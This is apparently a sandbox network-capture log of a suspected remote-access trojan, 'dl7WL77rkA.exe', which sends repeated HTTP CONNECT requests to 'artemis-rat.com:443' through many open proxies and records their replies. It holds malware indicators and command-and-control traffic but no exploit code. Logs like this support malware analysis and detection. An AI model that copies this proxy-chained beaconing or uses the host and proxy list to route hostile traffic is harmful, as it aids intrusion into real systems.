Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1574192.168.2.554407104.16.105.146803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.164951086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.319257021 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1575192.168.2.55417545.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.165889025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1576192.168.2.55420720.206.106.192803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.166353941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.491108894 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1577192.168.2.5542088.130.39.15533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.167222023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.485606909 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1578192.168.2.55423839.105.27.3031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.173779964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.593079090 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1579192.168.2.552779118.174.143.3841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.173804045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1580192.168.2.553517116.106.105.5510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.174478054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1581192.168.2.554218185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.174820900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1582192.168.2.55424343.131.242.162156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.175223112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1583192.168.2.554188103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.176071882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1584192.168.2.554340148.72.23.56423123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.176760912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014570951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989487886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905316114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1596192.168.2.554203103.120.6.46803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238045931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.626554012 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1597192.168.2.554448104.19.124.112803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238090992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.398859978 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1598192.168.2.55284994.131.14.6610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238595009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.998733997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1599192.168.2.55429445.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.243122101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1600192.168.2.552881148.72.209.174162033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.252711058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1601192.168.2.554347147.75.92.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.259526014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.549005032 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.549556017 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c d4 82 42 c6 84 81 1a c3 35 c7 1b 98 5e 5a 8e c6 09 3d ae b7 6e f9 76 6a 8d 57 0d 90 64 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhelB5^Z=nvjWd*,+0/$#('=<5/artemis-rat.com#[pQED76xbwFl2-tx}xd?$8T?


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1602192.168.2.55430758.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.261085987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1603192.168.2.55290743.255.113.23280833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.267601013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.621151924 CET208INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Server: HCS
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 05:18:08 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                                                            HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                                                                                                                                                                                            X-NGAA: MISS from CH-XW-NO1-315.3
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1604192.168.2.554296186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.270005941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1605192.168.2.554295194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.271541119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1606192.168.2.554164103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.275582075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1607192.168.2.554366118.34.105.25480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.279598951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.580271959 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1608192.168.2.550148103.255.147.102833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.284347057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.405126095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.194983959 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1609192.168.2.554306212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.284621000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1610192.168.2.554468172.67.182.0803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.294425964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.450469971 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1611192.168.2.55394474.119.147.20941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.302396059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1612192.168.2.554487172.67.38.96803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.306615114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.461124897 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
